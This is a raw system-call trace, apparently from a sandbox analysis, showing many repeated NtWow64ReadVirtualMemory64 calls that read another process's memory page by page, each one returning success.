NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b13000, Buffer=0x7ffb, BufferSize=0xaa3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.227] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b14000, Buffer=0x7ffb, BufferSize=0xaa4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.227] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b15000, Buffer=0x7ffb, BufferSize=0xaa5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.227] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b16000, Buffer=0x7ffb, BufferSize=0xaa6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.227] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b17000, Buffer=0x7ffb, BufferSize=0xaa7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.228] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b18000, Buffer=0x7ffb, BufferSize=0xaa8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.228] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b19000, Buffer=0x7ffb, BufferSize=0xaa9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.228] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1a000, Buffer=0x7ffb, BufferSize=0xaaa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.228] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1b000, Buffer=0x7ffb, BufferSize=0xaab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.229] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1c000, Buffer=0x7ffb, BufferSize=0xaac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.229] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1d000, Buffer=0x7ffb, BufferSize=0xaad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.229] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1e000, Buffer=0x7ffb, BufferSize=0xaae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.229] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1f000, Buffer=0x7ffb, BufferSize=0xaaf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.229] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b20000, Buffer=0x7ffb, BufferSize=0xab0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.229] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b21000, Buffer=0x7ffb, BufferSize=0xab1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.230] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b22000, Buffer=0x7ffb, BufferSize=0xab2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.230] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b23000, Buffer=0x7ffb, BufferSize=0xab3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.230] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b24000, Buffer=0x7ffb, BufferSize=0xab4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.230] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b25000, Buffer=0x7ffb, BufferSize=0xab5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.231] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b26000, Buffer=0x7ffb, BufferSize=0xab6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.231] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b27000, Buffer=0x7ffb, BufferSize=0xab7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.231] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b28000, Buffer=0x7ffb, BufferSize=0xab8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.232] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b29000, Buffer=0x7ffb, BufferSize=0xab9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.232] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2a000, Buffer=0x7ffb, BufferSize=0xaba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.232] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2b000, Buffer=0x7ffb, BufferSize=0xabb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.233] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2c000, Buffer=0x7ffb, BufferSize=0xabc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.233] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2d000, Buffer=0x7ffb, BufferSize=0xabd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.233] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2e000, Buffer=0x7ffb, BufferSize=0xabe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.233] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2f000, Buffer=0x7ffb, BufferSize=0xabf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.234] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b30000, Buffer=0x7ffb, BufferSize=0xac0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.234] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b31000, Buffer=0x7ffb, BufferSize=0xac1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.234] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b32000, Buffer=0x7ffb, BufferSize=0xac2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.234] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b33000, Buffer=0x7ffb, BufferSize=0xac3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.235] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b34000, Buffer=0x7ffb, BufferSize=0xac4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.235] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b35000, Buffer=0x7ffb, BufferSize=0xac5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.235] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b36000, Buffer=0x7ffb, BufferSize=0xac6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.235] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b37000, Buffer=0x7ffb, BufferSize=0xac7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.236] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b38000, Buffer=0x7ffb, BufferSize=0xac8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.236] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b39000, Buffer=0x7ffb, BufferSize=0xac9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.236] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3a000, Buffer=0x7ffb, BufferSize=0xaca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.236] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3b000, Buffer=0x7ffb, BufferSize=0xacb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.237] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3c000, Buffer=0x7ffb, BufferSize=0xacc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.237] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3d000, Buffer=0x7ffb, BufferSize=0xacd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.237] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3e000, Buffer=0x7ffb, BufferSize=0xace000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.237] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3f000, Buffer=0x7ffb, BufferSize=0xacf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.238] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b40000, Buffer=0x7ffb, BufferSize=0xad0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.238] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b41000, Buffer=0x7ffb, BufferSize=0xad1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.238] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b42000, Buffer=0x7ffb, BufferSize=0xad2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.238] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b43000, Buffer=0x7ffb, BufferSize=0xad3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.238] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b44000, Buffer=0x7ffb, BufferSize=0xad4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.239] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b45000, Buffer=0x7ffb, BufferSize=0xad5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.239] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b46000, Buffer=0x7ffb, BufferSize=0xad6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.239] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b47000, Buffer=0x7ffb, BufferSize=0xad7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.239] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b48000, Buffer=0x7ffb, BufferSize=0xad8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.239] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b49000, Buffer=0x7ffb, BufferSize=0xad9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.240] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4a000, Buffer=0x7ffb, BufferSize=0xada000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.240] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4b000, Buffer=0x7ffb, BufferSize=0xadb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.242] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4c000, Buffer=0x7ffb, BufferSize=0xadc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.242] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4d000, Buffer=0x7ffb, BufferSize=0xadd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.242] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4e000, Buffer=0x7ffb, BufferSize=0xade000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.242] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4f000, Buffer=0x7ffb, BufferSize=0xadf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.243] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b50000, Buffer=0x7ffb, BufferSize=0xae0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.243] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b51000, Buffer=0x7ffb, BufferSize=0xae1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.243] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b52000, Buffer=0x7ffb, BufferSize=0xae2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.243] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b53000, Buffer=0x7ffb, BufferSize=0xae3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.243] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b54000, Buffer=0x7ffb, BufferSize=0xae4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.244] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b55000, Buffer=0x7ffb, BufferSize=0xae5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.244] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b56000, Buffer=0x7ffb, BufferSize=0xae6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.244] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b57000, Buffer=0x7ffb, BufferSize=0xae7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.244] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b58000, Buffer=0x7ffb, BufferSize=0xae8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.244] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b59000, Buffer=0x7ffb, BufferSize=0xae9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.245] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5a000, Buffer=0x7ffb, BufferSize=0xaea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.245] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5b000, Buffer=0x7ffb, BufferSize=0xaeb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.245] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5c000, Buffer=0x7ffb, BufferSize=0xaec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.245] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5d000, Buffer=0x7ffb, BufferSize=0xaed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.245] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5e000, Buffer=0x7ffb, BufferSize=0xaee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.246] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5f000, Buffer=0x7ffb, BufferSize=0xaef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.246] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b60000, Buffer=0x7ffb, BufferSize=0xaf0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.246] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b61000, Buffer=0x7ffb, BufferSize=0xaf1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.246] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b62000, Buffer=0x7ffb, BufferSize=0xaf2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.246] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b63000, Buffer=0x7ffb, BufferSize=0xaf3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.247] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b64000, Buffer=0x7ffb, BufferSize=0xaf4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.247] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b65000, Buffer=0x7ffb, BufferSize=0xaf5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.247] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b66000, Buffer=0x7ffb, BufferSize=0xaf6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.247] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b67000, Buffer=0x7ffb, BufferSize=0xaf7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.247] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b68000, Buffer=0x7ffb, BufferSize=0xaf8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.248] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b69000, Buffer=0x7ffb, BufferSize=0xaf9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.248] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6a000, Buffer=0x7ffb, BufferSize=0xafa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.248] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6b000, Buffer=0x7ffb, BufferSize=0xafb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.248] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6c000, Buffer=0x7ffb, BufferSize=0xafc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.248] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6d000, Buffer=0x7ffb, BufferSize=0xafd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.249] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6e000, Buffer=0x7ffb, BufferSize=0xafe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.249] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6f000, Buffer=0x7ffb, BufferSize=0xaff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.249] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b70000, Buffer=0x7ffb, BufferSize=0xb00000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.249] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b71000, Buffer=0x7ffb, BufferSize=0xb01000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.249] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b72000, Buffer=0x7ffb, BufferSize=0xb02000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.250] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b73000, Buffer=0x7ffb, BufferSize=0xb03000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.250] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b74000, Buffer=0x7ffb, BufferSize=0xb04000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.250] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b75000, Buffer=0x7ffb, BufferSize=0xb05000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.250] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b76000, Buffer=0x7ffb, BufferSize=0xb06000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.251] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b77000, Buffer=0x7ffb, BufferSize=0xb07000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.251] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b78000, Buffer=0x7ffb, BufferSize=0xb08000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.251] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b79000, Buffer=0x7ffb, BufferSize=0xb09000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.251] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7a000, Buffer=0x7ffb, BufferSize=0xb0a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.251] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7b000, Buffer=0x7ffb, BufferSize=0xb0b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.252] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7c000, Buffer=0x7ffb, BufferSize=0xb0c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.252] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7d000, Buffer=0x7ffb, BufferSize=0xb0d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.252] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7e000, Buffer=0x7ffb, BufferSize=0xb0e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.252] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7f000, Buffer=0x7ffb, BufferSize=0xb0f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.253] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b80000, Buffer=0x7ffb, BufferSize=0xb10000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.253] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b81000, Buffer=0x7ffb, BufferSize=0xb11000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.253] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b82000, Buffer=0x7ffb, BufferSize=0xb12000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.253] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b83000, Buffer=0x7ffb, BufferSize=0xb13000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.253] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b84000, Buffer=0x7ffb, BufferSize=0xb14000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.254] 